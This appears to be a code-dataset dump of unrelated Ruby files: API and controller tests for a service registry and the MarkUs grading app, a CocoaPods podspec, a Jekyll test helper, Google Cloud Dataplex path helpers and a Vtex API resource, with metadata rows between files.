@sample_service = {:name => 'rspec_sample_service', :status => 'up'}
@h = Noah::Host.create(:name => 'rspec_sample_host', :status => 'up')
@h.services << Noah::Service.create({:host => @h}.merge(@sample_service))
@h.save
@s = Noah::Service.find(@sample_service).first
end
describe "calling" do
describe "GET" do
it "all services should work" do
get '/services'
last_response.should be_ok
response = last_response.should return_json
response.is_a?(Hash).should == true
end
it "all named services should work" do
get "/services/#{@sample_service[:name]}"
last_response.should be_ok
response = last_response.should return_json
response.class.to_s.should == "Hash"
response.has_key?(@s.name.to_s).should == true
response["#{@s.name}"].class.to_s.should == "Hash"
response["#{@s.name}"].has_key?(@h.name.to_s).should == true
response["#{@s.name}"]["#{@h.name}"].class.to_s.should == "Hash"
response["#{@s.name}"]["#{@h.name}"]["id"].should == @s.id
response["#{@s.name}"]["#{@h.name}"]["status"].should == @s.status
end
it "named service for host should work" do
get "/services/#{@sample_service[:name]}/#{@sample_host[:name]}"
last_response.should be_ok
response = last_response.should return_json
response["id"].should == @s.id
response["name"].should == @s.name
response["status"].should == @s.status
response["host"].should == @h.name
end
it "missing service for host should not work" do
get '/services/foobar/baz'
last_response.should be_missing
end
end
describe "PUT" do
before(:each) do
Ohm.redis.flushdb
@host_name = 'rspec_sample_host'
@service_name = 'rspec_sample_service'
@payload = {:status => 'up', :host_status => 'up'}
end
after(:each) do
Ohm.redis.flushdb
end
it "new service on new host should work" do
put "/services/#{@service_name}/#{@host_name}", @payload.to_json, "CONTENT_TYPE" => "application/json"
last_response.should be_ok
response = last_response.should return_json
response["result"].should == "success"
response["action"].should == "create"
response["id"].nil?.should == false
response["name"].should == @service_name
response["host"]["name"].should == @host_name
response["host"]["status"].should == 'up'
response["host"]["action"].should == 'create'
response["host"]["status"].should == 'up'
Noah::Service.find(:name => @service_name).size.should == 1
Noah::Service.find(:name => @service_name).first.is_new?.should == true
Noah::Host.find(:name => @host_name).size.should == 1
Noah::Host.find(:name => @host_name).first.is_new?.should == true
end
it "new service on existing host should work" do
hostname = 'non-existant-rspec-host'
servicename = 'non-existant-rspec-service'
Noah::Host.create(:name => hostname, :status => 'up')
sleep(3)
put "/services/#{servicename}/#{hostname}", @payload.to_json, "CONTENT_TYPE" => "application/json"
last_response.should be_ok
response = last_response.should return_json
response["result"].should == "success"
response["action"].should == "create"
response["id"].nil?.should == false
response["name"].should == servicename
response["host"]["name"].should == hostname
response["host"]["status"].should == 'up'
response["host"]["action"].should == 'update'
Noah::Service.find(:name => servicename).size.should == 1
Noah::Service.find(:name => servicename).first.is_new?.should == true
end
it "new service with invalid host status should not work" do
put "/services/foobar/#{@host_name}", {:host_status => "fsck", :status => "up"}.to_json, "CONTENT_TYPE" => "application/json"
last_response.should_not be_ok
response = last_response.should return_json
response["error_message"].should == "Status must be up, down or pending"
end
it "new service with invalid service status should not work" do
put "/services/foobar/#{@host_name}", {:host_status => "up", :status => "fsck"}.to_json, "CONTENT_TYPE" => "application/json"
last_response.should_not be_ok
response = last_response.should return_json
response["error_message"].should == "Status must be up, down or pending"
end
it "new service with missing host_status should not work" do
put "/services/foobar/#{@host_name}", {:status => "up"}.to_json, "CONTENT_TYPE" => "application/json"
last_response.should be_invalid
end
it "new service with missing status should not work" do
put "/services/foobar/#{@host_name}", {:host_status => 'up'}.to_json, "CONTENT_TYPE" => "application/json"
last_response.should be_invalid
end
it "existing service should work" do
a = Noah::Host.create(:name => @host_name, :status => 'up')
b = Noah::Service.create(:name => @service_name, :status => 'pending', :host => a)
sleep(3)
put "/services/#{@service_name}/#{@host_name}", @payload.to_json, "CONTENT_TYPE" => "application/json"
last_response.should be_ok
response = last_response.should return_json
response["result"].should == "success"
response["action"].should == "update"
response["id"].nil?.should == false
response["name"].should == @service_name
response["host"]["name"].should == @host_name
response["host"]["status"].should == 'up'
response["host"]["action"].should == 'update'
end
end
describe "DELETE" do
before(:all) do
Ohm.redis.flushdb
@h = Noah::Host.create(:name => "h1", :status => "up")
@h.services << Noah::Service.create(:name => "s1", :status => "up", :host => @h)
@h.save
@s = @h.services.first
end
it "service from existing host should work" do
delete "/services/#{@s.name}/#{@h.name}"
last_response.should be_ok
response = last_response.should return_json
response["result"].should == "success"
response["action"].should == "delete"
response["id"].should == @s.id
response["host"].should == @h.name
response["service"].should == @s.name
end
it "all entries for a valid service" do
all_svc_name = 'my_sample_service'
foo_svc_name = 'my_sample_service_two'
bar_svc_name = 'my_sample_service_three'
%w[foo bar baz].each do |host|
h = Noah::Host.create(:name => host, :status => "up")
Noah::Service.create(:name => all_svc_name, :status => 'up', :host => h)
end
foo_host = Noah::Host.find(:name => 'foo').first
bar_host = Noah::Host.find(:name => 'bar').first
Noah::Service.create(:name => foo_svc_name, :status => 'down', :host => foo_host)
Noah::Service.create(:name => bar_svc_name, :status => 'pending', :host => bar_host)
delete "/services/#{all_svc_name}"
last_response.should be_ok
response = last_response.should return_json
response["result"].should == "success"
response["action"].should == "delete"
response["affected_hosts"].should == 3
delete "/services/#{foo_svc_name}"
last_response.should be_ok
response = last_response.should return_json
response["affected_hosts"].should == 1
end
it "service for invalid host should not work" do
delete "/services/#{@s.name}/#{@h.name}"
last_response.should be_missing
end
it "invalid service for valid host should not work" do
Noah::Host.create(:name => 'valid_host', :status => 'up')
delete "/services/not_really_here/valid_host"
last_response.should be_missing
end
it "all entries for an invalid service should not_work" do
delete "/services/not_really_here"
last_response.should be_missing
end
end
end
end
| 44.915789 | 133 | 0.608156 |
1daea8a8328be22d9cefec01b68c714bda4ea5f4 | 821 | Pod::Spec.new do |s|
s.name = "OneSignalXCFramework"
s.version = "3.4.4"
s.summary = "OneSignal push notification library for mobile apps."
s.homepage = "https://onesignal.com"
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { "Joseph Kalash" => "[email protected]", "Josh Kasten" => "[email protected]" , "Brad Hesse" => "[email protected]"}
s.source = { :git => "https://github.com/OneSignal/OneSignal-iOS-SDK.git", :tag => s.version.to_s }
s.platform = :ios
s.requires_arc = true
s.ios.vendored_frameworks = 'iOS_SDK/OneSignalSDK/OneSignal_XCFramework/OneSignal.xcframework'
s.preserve_paths = 'iOS_SDK/OneSignalSDK/OneSignal_XCFramework/OneSignal.xcframework'
end
| 48.294118 | 147 | 0.606577 |
03bcdc14d6852538a62ceac3d4c5b3bf713f5b2b | 874 | # Builds the Hub in a temp directory for use by several tests.
#
# Just adding `require_relative 'site_builder'` at the beginning of the test
# file is all that's required.
module Hub
class SiteBuilder
BUILD_DIR = File.join(Dir.pwd, '_test', 'tmp')
unless system(
"bundle exec jekyll build --destination #{BUILD_DIR} --trace",
{:out => '/dev/null', :err =>STDERR})
STDERR.puts "\n***\nSiteBuilder failed to build site for tests\n***\n"
exit $?.exitstatus
end
PUBLIC_BUILD_DIR = "#{BUILD_DIR}_public"
unless system(
"bundle exec jekyll build --destination #{PUBLIC_BUILD_DIR} --trace " +
"--config _config.yml,_config_public.yml",
{:out => '/dev/null', :err =>STDERR})
STDERR.puts("\n***\nSiteBuilder failed to build public site " +
"for tests\n***\n")
exit $?.exitstatus
end
end
end
| 33.615385 | 77 | 0.639588 |
f7a25a668f6b09da6ebd1dceaba36ee63958926b | 7,073 | # frozen_string_literal: true
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
module Cloud
module Dataplex
module V1
module DataplexService
# Path helper methods for the DataplexService API.
module Paths
##
# Create a fully-qualified Asset resource string.
#
# The resource will be in the following format:
#
# `projects/{project}/locations/{location}/lakes/{lake}/zones/{zone}/assets/{asset}`
#
# @param project [String]
# @param location [String]
# @param lake [String]
# @param zone [String]
# @param asset [String]
#
# @return [::String]
def asset_path project:, location:, lake:, zone:, asset:
raise ::ArgumentError, "project cannot contain /" if project.to_s.include? "/"
raise ::ArgumentError, "location cannot contain /" if location.to_s.include? "/"
raise ::ArgumentError, "lake cannot contain /" if lake.to_s.include? "/"
raise ::ArgumentError, "zone cannot contain /" if zone.to_s.include? "/"
"projects/#{project}/locations/#{location}/lakes/#{lake}/zones/#{zone}/assets/#{asset}"
end
##
# Create a fully-qualified Environment resource string.
#
# The resource will be in the following format:
#
# `projects/{project}/locations/{location}/lakes/{lake}/environments/{environment}`
#
# @param project [String]
# @param location [String]
# @param lake [String]
# @param environment [String]
#
# @return [::String]
def environment_path project:, location:, lake:, environment:
raise ::ArgumentError, "project cannot contain /" if project.to_s.include? "/"
raise ::ArgumentError, "location cannot contain /" if location.to_s.include? "/"
raise ::ArgumentError, "lake cannot contain /" if lake.to_s.include? "/"
"projects/#{project}/locations/#{location}/lakes/#{lake}/environments/#{environment}"
end
##
# Create a fully-qualified Job resource string.
#
# The resource will be in the following format:
#
# `projects/{project}/locations/{location}/lakes/{lake}/tasks/{task}/jobs/{job}`
#
# @param project [String]
# @param location [String]
# @param lake [String]
# @param task [String]
# @param job [String]
#
# @return [::String]
def job_path project:, location:, lake:, task:, job:
raise ::ArgumentError, "project cannot contain /" if project.to_s.include? "/"
raise ::ArgumentError, "location cannot contain /" if location.to_s.include? "/"
raise ::ArgumentError, "lake cannot contain /" if lake.to_s.include? "/"
raise ::ArgumentError, "task cannot contain /" if task.to_s.include? "/"
"projects/#{project}/locations/#{location}/lakes/#{lake}/tasks/#{task}/jobs/#{job}"
end
##
# Create a fully-qualified Lake resource string.
#
# The resource will be in the following format:
#
# `projects/{project}/locations/{location}/lakes/{lake}`
#
# @param project [String]
# @param location [String]
# @param lake [String]
#
# @return [::String]
def lake_path project:, location:, lake:
raise ::ArgumentError, "project cannot contain /" if project.to_s.include? "/"
raise ::ArgumentError, "location cannot contain /" if location.to_s.include? "/"
"projects/#{project}/locations/#{location}/lakes/#{lake}"
end
##
# Create a fully-qualified Location resource string.
#
# The resource will be in the following format:
#
# `projects/{project}/locations/{location}`
#
# @param project [String]
# @param location [String]
#
# @return [::String]
def location_path project:, location:
raise ::ArgumentError, "project cannot contain /" if project.to_s.include? "/"
"projects/#{project}/locations/#{location}"
end
##
# Create a fully-qualified Task resource string.
#
# The resource will be in the following format:
#
# `projects/{project}/locations/{location}/lakes/{lake}/tasks/{task}`
#
# @param project [String]
# @param location [String]
# @param lake [String]
# @param task [String]
#
# @return [::String]
def task_path project:, location:, lake:, task:
raise ::ArgumentError, "project cannot contain /" if project.to_s.include? "/"
raise ::ArgumentError, "location cannot contain /" if location.to_s.include? "/"
raise ::ArgumentError, "lake cannot contain /" if lake.to_s.include? "/"
"projects/#{project}/locations/#{location}/lakes/#{lake}/tasks/#{task}"
end
##
# Create a fully-qualified Zone resource string.
#
# The resource will be in the following format:
#
# `projects/{project}/locations/{location}/lakes/{lake}/zones/{zone}`
#
# @param project [String]
# @param location [String]
# @param lake [String]
# @param zone [String]
#
# @return [::String]
def zone_path project:, location:, lake:, zone:
raise ::ArgumentError, "project cannot contain /" if project.to_s.include? "/"
raise ::ArgumentError, "location cannot contain /" if location.to_s.include? "/"
raise ::ArgumentError, "lake cannot contain /" if lake.to_s.include? "/"
"projects/#{project}/locations/#{location}/lakes/#{lake}/zones/#{zone}"
end
extend self
end
end
end
end
end
end
| 39.513966 | 101 | 0.545737 |
ac12dfeeef10a54d528fc04291b4dec8b835b804 | 1,030 | module Vtex
class SpecificationResource < ResourceKit::Resource
resources do
action :specification_by_category_id, 'GET /api/catalog_system/pub/specification/field/listByCategoryId/:category_id' do
handler(200) { |response| SpecificationMapping.extract_collection(response.body, :read) }
end
action :specification_tree_by_category_id, 'GET /api/catalog_system/pub/specification/field/listTreeByCategoryId/:category_id' do
handler(200) { |response| SpecificationMapping.extract_collection(response.body, :read) }
end
action :specification_value_by_field_id, 'GET /api/catalog_system/pub/specification/fieldvalue/:field_id' do
handler(200) { |response| SpecificationValueByFieldIdMapping.extract_collection(response.body, :read) }
end
action :specification_field, 'GET /api/catalog_system/pub/specification/fieldGet/:field_id' do
handler(200) { |response| SpecificationFieldMapping.extract_single(response.body, :read) }
end
end
end
end
| 46.818182 | 135 | 0.756311 |
ff2a3514ee5255bd68941c2ecd1385d0b20e9ca4 | 43,947 | require File.expand_path(File.join(File.dirname(__FILE__), 'authenticated_controller_test'))
require File.expand_path(File.join(File.dirname(__FILE__), '..', 'test_helper'))
require File.expand_path(File.join(File.dirname(__FILE__), '..', 'blueprints', 'helper'))
require 'shoulda'
class ResultsControllerTest < AuthenticatedControllerTest
def teardown
destroy_repos
end
SAMPLE_ERR_MSG = 'sample error message'
should 'recognize routes' do
assert_recognizes({controller: 'results',
action: 'update_mark',
assignment_id: '1',
submission_id: '1'},
{path: 'assignments/1/submissions/1/results/update_mark',
method: :post})
end
context 'A user' do
# Since we are not authenticated and authorized, we should be redirected
# to the login page
should 'be redirected from edit' do
get :edit, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to get the next_grouping' do
get :next_grouping, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to set_released to student' do
get :set_released_to_students, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to update marking state' do
get :toggle_marking_state, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to update overall comment' do
get :update_overall_comment, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to update remark request' do
get :update_remark_request, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to cancel remark request' do
delete :cancel_remark_request, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to download a file' do
get :download, params: { assignment_id: 1, submission_id: 1, id: 1, select_file_id: 1 }
assert_response :redirect
end
should 'not be able to update mark' do
get :update_mark, params: { assignment_id: 1, submission_id: 1, id: 1, mark_id: 1, mark: 0 }
assert_response :redirect
end
should 'not be able to view marks' do
get :view_marks, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
should 'not be able to add extra mark' do
get :add_extra_mark, params: { assignment_id: 1, submission_id: 1, id: 1, extra_mark: 1 }
assert_response :redirect
end
should 'not be able to remove extra marks' do
get :remove_extra_mark, params: { assignment_id: 1, submission_id: 1, id: 1 }
assert_response :redirect
end
end # unauthenticated and unauthorized user doing
context 'A student' do
{setup_student_flexible: 'flexible',
setup_student_rubric: 'rubric'}.each do |setup_method, criterion_type|
context "Using #{criterion_type} and doing a" do
setup do
@student = Student.make
@assignment = Assignment.make
@grouping = Grouping.make(assignment: @assignment)
StudentMembership.make(
grouping: @grouping,
user: @student,
membership_status: StudentMembership::STATUSES[:inviter])
@submission = Submission.make(grouping: @grouping)
@result = @grouping.submissions.first.get_latest_result
end
should 'not be able to get edit' do
get_as @student, :edit, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id }
assert_response :missing
assert render_template 404
end
should 'not be able to get next_grouping' do
get_as @student, :next_grouping, params: { assignment_id: @assignment.id, submission_id: 1,
grouping_id: @grouping.id, id: @result.id }
assert_response :missing
assert render_template 404
end
should 'GET on :set_released_to_student' do
get_as @student, :set_released_to_students, params: { assignment_id: @assignment.id, submission_id: 1,
id: @result.id }
assert_response :missing
assert render_template 404
end
should 'GET on :toggle_marking_state' do
get_as @student, :toggle_marking_state, params: { assignment_id: @assignment.id, submission_id: 1,
id: @result.id },
format: :js
assert_response :missing
assert render_template 404
end
should 'GET on :update_overall_comment' do
@new_comment = 'a changed overall comment!'
get_as @student, :update_overall_comment, params: { assignment_id: @assignment.id, submission_id: 1,
id: @result.id,
result: { overall_comment: @new_comment } }
assert_response :missing
assert render_template 404
@result.reload
assert_not_equal @result.overall_comment, @new_comment
end
should 'POST on :update_overall_comment' do
@new_comment = 'a changed overall comment!'
post_as @student, :update_overall_comment, params: { assignment_id: @assignment.id, submission_id: 1,
id: @result.id,
result: { overall_comment: @new_comment } }
assert_response :missing
assert render_template 404
@result.reload
assert_not_equal @result.overall_comment, @new_comment
end
context 'GET on :download' do
setup do
@file = SubmissionFile.new
end
context 'without file error' do
should 'with permissions to download the file' do
@file.expects(:filename).once.returns('filename')
@file.expects(:is_supported_image?).once.returns(false)
@file.expects(:retrieve_file).returns('file content')
ResultsController.any_instance.stubs(
:authorized_to_download?).once.returns(true)
SubmissionFile.stubs(:find).once.returns(@file)
get_as @student, :download, params: { assignment_id: 1, submission_id: 1, select_file_id: 1, id: 1 }
assert_equal true, flash.empty?
assert_equal response.header['Content-Type'], 'application/octet-stream'
assert_response :success
assert_equal 'file content', @response.body
end # -- with permissions to download the file
should 'without permissions to download the file' do
ResultsController.any_instance.stubs(
:authorized_to_download?).once.returns(false)
get_as @student, :download, params: { assignment_id: 1, submission_id: 1, select_file_id: 1, id: 1 }
assert_equal true, flash.empty?
assert_response :missing
assert render_template 404
end # -- without permissions to download the file
end # -- without file error
should 'be able to retrieve_file with file error' do
@file.expects(:submission).twice.returns(@result.submission)
@file.expects(
:retrieve_file).once.raises(Exception.new(SAMPLE_ERR_MSG))
ResultsController.any_instance.stubs(
:authorized_to_download?).once.returns(true)
SubmissionFile.stubs(:find).once.returns(@file)
get_as @student, :download, params: { assignment_id: 1, submission_id: 1, id: 1, select_file_id: 1 }
assert_equal flash[:file_download_error], SAMPLE_ERR_MSG
assert_response :redirect
end
should 'with supported image to be displayed inside browser' do
@file.expects(:filename).once.returns('filename.supported_image')
@file.expects(:is_supported_image?).once.returns(true)
@file.expects(:retrieve_file).returns('file content')
ResultsController.any_instance.stubs(
:authorized_to_download?).once.returns(true)
SubmissionFile.stubs(:find).once.returns(@file)
get_as @student, :download, params: { assignment_id: 1, submission_id: 1, select_file_id: 1, id: 1,
show_in_browser: true }
assert_equal true, flash.empty?
assert_equal response.header['Content-Type'], 'image'
assert_response :success
assert_equal 'file content', @response.body
end
should 'with annotations included' do
@file.expects(:filename).once.returns('filename')
@file.expects(:is_supported_image?).once.returns(false)
@file.expects(:retrieve_file).returns('file content')
ResultsController.any_instance.stubs(:authorized_to_download?).once.returns(true)
SubmissionFile.stubs(:find).once.returns(@file)
get_as @student, :download, params: { assignment_id: 1, submission_id: 1, select_file_id: 1, id: 1,
include_annotations: true }
assert_equal true, flash.empty?
assert_equal response.header['Content-Type'], 'application/octet-stream'
assert_response :success
assert_equal 'file content', @response.body
end
end
should 'GET on :update_mark' do
get_as @student, :update_mark, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id,
mark_id: 1, mark: 0 }
assert_response :missing
assert render_template 404
end
context 'GET on :view_marks' do
should 'and his grouping has no submission' do
Grouping.any_instance.expects(:has_submission?).once.returns(false)
get_as @student, :view_marks, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id }
assert_not_nil assigns :assignment
assert_not_nil assigns :grouping
assert render_template 'results/student/no_submission'
assert_response :success
end
should 'and his submission has no result' do
Submission.any_instance.expects(:has_result?).once.returns(false)
get_as @student, :view_marks, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id }
assert_not_nil assigns :assignment
assert_not_nil assigns :grouping
assert_not_nil assigns :submission
assert render_template 'results/student/no_result'
assert_response :success
end
should 'and the result has not been released' do
Result.any_instance.expects(
:released_to_students).once.returns(false)
get_as @student, :view_marks, params: { assignment_id: @assignment.id, submission_id: @submission.id,
id: @result.id }
assert_not_nil assigns :assignment
assert_not_nil assigns :grouping
assert_not_nil assigns :submission
assert_not_nil assigns :result
assert render_template 'results/student/no_result'
assert_response :success
end
should 'and the result is available' do
SubmissionFile.make(submission: @submission)
Mark.make(criterion_type.to_sym, result: @result)
AnnotationCategory.make(assignment: @assignment)
@submission_file = @result.submission.submission_files.first
@result.marking_state = Result::MARKING_STATES[:complete]
@result.released_to_students = true
@result.save
get_as @student, :view_marks, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id }
assert_not_nil assigns :assignment
assert_not_nil assigns :grouping
assert_not_nil assigns :submission
assert_not_nil assigns :result
assert_not_nil assigns :mark_criteria
assert_not_nil assigns :annotation_categories
assert_not_nil assigns :group
assert_not_nil assigns :files
assert_not_nil assigns :extra_marks_points
assert_not_nil assigns :extra_marks_percentage
assert_not_nil assigns :marks_map
assert_response :success
assert render_template :view_marks
end
end
should 'GET on :add_extra_mark' do
get_as @student, :add_extra_mark, params: { assignment_id: 1, submission_id: 1, id: @result.id,
extra_mark: 1 }
assert_response :missing
assert render_template 404
end
should 'GET on :remove_extra_mark' do
get_as @student, :remove_extra_mark, params: { assignment_id: 1, submission_id: 1, id: @result.id }
assert_response :missing
assert render_template 404
end
end
end
end # An authenticated and authorized student doing a
context 'An admin' do
{setup_admin_flexible: 'flexible',
setup_admin_rubric: 'rubric'}.each do |setup_method, criterion_type|
context "using #{criterion_type} and doing a" do
setup do
@admin = Admin.make
@assignment = Assignment.make
end
context 'GET on :edit' do
context 'with 2 incomplete and 1 released/completed results' do
setup do
3.times do |time|
g = Grouping.make(assignment: @assignment)
s = Submission.make(grouping: g)
student = Student.make
if time == 2
@result = s.get_latest_result
@result.marking_state = Result::MARKING_STATES[:complete]
@result.released_to_students = true
@result.save
end
StudentMembership.make(grouping: g,
user: student,
membership_status:
StudentMembership::STATUSES[:inviter])
end
@groupings = @assignment.groupings.order(:id)
end
should 'have an edit forms with correct actions for' +
'overall comment' do
# Use a released result as the original result.
original_result = @result
submission = original_result.submission
submission.make_remark_result
submission.update(remark_request_timestamp: Time.zone.now)
get_as @admin, :edit, params: { assignment_id: @assignment.id, submission_id: submission.id,
id: submission.remark_result.id }
path_prefix = "/en/assignments/#{@assignment.id}" +
"/submissions/#{submission.id}/results"
assert_select '#overall_comment_edit form[action=' +
"'#{path_prefix}/#{original_result.id}" +
"/update_overall_comment']"
end
should 'edit third result' do
@result = @groupings[0].current_submission_used.get_latest_result
get_as @admin, :edit, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id }
assert_not_nil assigns(:next_grouping)
next_grouping = assigns(:next_grouping)
assert next_grouping.has_submission?
next_result = next_grouping.current_submission_used.get_latest_result
assert_not_nil next_result
assert_equal next_grouping, @groupings[1]
assert !next_result.released_to_students
assert_nil assigns(:previous_grouping)
assert_equal true, flash.empty?
assert render_template :edit
assert_response :success
end
should 'edit second result correctly' do
@result = @groupings[1].current_submission_used.get_latest_result
get_as @admin, :edit, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id }
assert_not_nil assigns(:next_grouping)
assert_not_nil assigns(:previous_grouping)
next_grouping = assigns(:next_grouping)
previous_grouping = assigns(:previous_grouping)
assert next_grouping.has_submission?
assert previous_grouping.has_submission?
next_result = next_grouping.current_submission_used.get_latest_result
previous_result = previous_grouping.current_submission_used.get_latest_result
assert_not_nil next_result
assert_not_nil previous_result
assert_equal next_grouping, @groupings[2]
assert_equal previous_grouping, @groupings[0]
assert next_result.released_to_students
assert !previous_result.released_to_students
assert_equal true, flash.empty?
assert render_template :edit
assert_response :success
end
should 'when editing third result' do
@result = @groupings[2].current_submission_used.get_latest_result
get_as @admin, :edit, params: { assignment_id: @assignment.id, submission_id: 1, id: @result.id }
assert_nil assigns(:next_grouping)
assert_not_nil assigns(:previous_grouping)
previous_grouping = assigns(:previous_grouping)
assert previous_grouping.has_submission?
previous_result = previous_grouping.current_submission_used.get_latest_result
assert_not_nil previous_result
assert_equal previous_grouping, @groupings[1]
assert !previous_result.released_to_students
assert_equal true, flash.empty?
assert render_template :edit
assert_response :success
end
end
end
context 'GET on :next_grouping' do
should 'when current grouping has submission' do
grouping = Grouping.make
result = Result.make
Grouping.any_instance.stubs(:has_submission).returns(true)
get_as @admin, :next_grouping, params: { assignment_id: @assignment.id, submission_id: 1,
grouping_id: grouping.id, id: result.id }
assert_response :redirect
end
should 'when current grouping has no submission' do
grouping = Grouping.make
result = Result.make
Grouping.any_instance.stubs(:has_submission).returns(false)
get_as @admin, :next_grouping, params: { assignment_id: @assignment.id, submission_id: 1,
grouping_id: grouping.id, id: result.id }
assert_response :redirect
end
end
should 'GET on :set_released_to_students' do
g = Grouping.make(assignment: @assignment)
s = Submission.make(grouping: g)
@result = s.get_latest_result
get_as @admin, :set_released_to_students, params: { assignment_id: @assignment.id, submission_id: 1,
id: @result.id, value: 'true' },
format: :js
assert_response :success
assert_not_nil assigns :result
end
context 'GET on :toggle_marking_state' do
setup do
# refresh the grade distribution - there's already a completed mark so far
# for each rubric type, in the following grade range:
# flexible: 6-10%
# rubric: 21-25%
g = Grouping.make(assignment: @assignment)
s = Submission.make(grouping: g)
@result = s.get_latest_result
Mark.make(criterion_type.to_sym, result: @result)
@assignment.assignment_stat.refresh_grade_distribution
@grade_distribution = @assignment.assignment_stat.grade_distribution_percentage
# convert @grade_distribution csv to an array
@grade_distribution = @grade_distribution.parse_csv.map{ |x| x.to_i }
# after the call to get_as, a second result for each marking scheme type
# will be marked as complete, a result which will be in the same grade range
# therefore we must increment the number of groupings at the given range for
# each marking scheme type
if criterion_type == 'rubric'
@grade_distribution[4] += 1
else
@grade_distribution[1] += 1
end
get_as @admin, :toggle_marking_state, params: { assignment_id: @assignment.id, submission_id: 1,
id: @result.id },
format: :js
end
should 'refresh the cached grade distribution data when the marking state is set to complete' do
@assignment.reload
actual_distribution = @assignment.assignment_stat.grade_distribution_percentage.parse_csv.map{ |x| x.to_i }
assert_equal actual_distribution, @grade_distribution
assert_not_nil assigns :result
end
should respond_with :success
end
context 'GET on :download' do
setup do
@file = SubmissionFile.new
end
should 'download without file error' do
@file.expects(:filename).once.returns('filename')
@file.expects(:retrieve_file).returns('file content')
@file.expects(:is_supported_image?).once.returns(false)
SubmissionFile.stubs(:find).returns(@file)
get_as @admin, :download, params: { assignment_id: 1, submission_id: 1, select_file_id: 1, id: 1 }
assert_equal true, flash.empty?
assert_equal response.header['Content-Type'], 'application/octet-stream'
assert_response :success
assert_equal 'file content', @response.body
end # -- without file error
should 'download with file error' do
submission = Submission.make
SubmissionFile.any_instance.expects(:retrieve_file).once.raises(Exception.new(SAMPLE_ERR_MSG))
SubmissionFile.stubs(:find).returns(@file)
@file.expects(:submission).twice.returns(
submission)
get_as @admin, :download, params: { assignment_id: 1, submission_id: 1, select_file_id: 1, id: 1 }
assert_equal flash[:file_download_error], SAMPLE_ERR_MSG
assert_response :redirect
end # -- with file error
should 'with supported image to be displayed inside browser' do
@file.expects(:filename).once.returns(
'filename.supported_image')
@file.expects(:retrieve_file).returns('file content')
@file.expects(:is_supported_image?).once.returns(true)
SubmissionFile.stubs(:find).returns(@file)
get_as @admin, :download, params: { assignment_id: 1, submission_id: 1, id: 1, select_file_id: 1,
show_in_browser: true }
assert_equal response.header['Content-Type'], 'image'
assert_response :success
assert_equal 'file content', @response.body
end # -- with supported image to be displayed in browser
end
context 'GET on :download_zip' do
setup do
@group = Group.make
@student = Student.make
@grouping = Grouping.make(group: @group,
assignment: @assignment)
@membership = StudentMembership.make(user: @student,
membership_status: 'inviter',
grouping: @grouping)
@student = @membership.user
@file1_name = 'TestFile.java'
@file1_content = "Some contents for TestFile.java\n"
@group.access_repo do |repo|
txn = repo.get_transaction('test')
path = File.join(@assignment.repository_folder, @file1_name)
txn.add(path, @file1_content, '')
repo.commit(txn)
# Generate submission
@submission = Submission.
generate_new_submission(@grouping, repo.get_latest_revision)
end
@annotation = TextAnnotation.new
@file = SubmissionFile.find_by_submission_id(@submission.id)
@annotation.
update_attributes({ line_start: 1,
line_end: 2,
submission_file_id: @file.id,
is_remark: false,
annotation_number: @submission.
annotations.count + 1
})
@annotation.annotation_text = AnnotationText.make
@annotation.save
end
should 'download in zip all files with annotations' do
get_as @admin, :download_zip,
assignment_id: @assignment.id,
submission_id: @submission.id,
id: @submission.id,
grouping_id: @grouping.id,
include_annotations: 'true'
assert_equal 'application/zip', response.header['Content-Type']
assert_response :success
zip_path = "tmp/#{@assignment.short_identifier}_" +
"#{@grouping.group.group_name}_r#{@grouping.group.repo.
get_latest_revision.revision_identifier}_ann.zip"
Zip::File.open(zip_path) do |zip_file|
file1_path = File.join("#{@assignment.repository_folder}-" +
"#{@grouping.group.repo_name}",
@file1_name)
assert_not_nil zip_file.find_entry(file1_path)
assert_equal @file.retrieve_file(true), zip_file.read(file1_path)
end
end
should 'download in zip all files without annotations' do
get_as @admin, :download_zip, params: { assignment_id: @assignment.id, submission_id: @submission.id,
id: @submission.id, grouping_id: @grouping.id,
include_annotations: 'false' }
assert_equal 'application/zip', response.header['Content-Type']
assert_response :success
zip_path = "tmp/#{@assignment.short_identifier}_" +
"#{@grouping.group.group_name}_r#{@grouping.group.repo.
get_latest_revision.revision_identifier}.zip"
Zip::File.open(zip_path) do |zip_file|
file1_path = File.join("#{@assignment.repository_folder}-" +
"#{@grouping.group.repo_name}",
@file1_name)
assert_not_nil zip_file.find_entry(file1_path)
assert_equal @file.retrieve_file, zip_file.read(file1_path)
end
end
end
context 'GET on :update_mark' do
setup do
g = Grouping.make(assignment: @assignment)
@submission = Submission.make(grouping: g)
@mark = Mark.make(criterion_type.to_sym, result: @submission.get_latest_result)
@result = @mark.result
end
should 'fails validation' do
ActiveModel::Errors.any_instance.stubs(
:full_messages).returns([SAMPLE_ERR_MSG])
get_as @admin, :update_mark, params: { assignment_id: @assignment.id, submission_id: 1, id: @mark.result.id,
mark_id: @mark.id, mark: 'something' },
format: :js
assert_match "0.0,0.0,0.0", @response.body
end
should 'with save error' do
@mark.expects(:save).once.returns(false)
Mark.stubs(:find).once.returns(@mark)
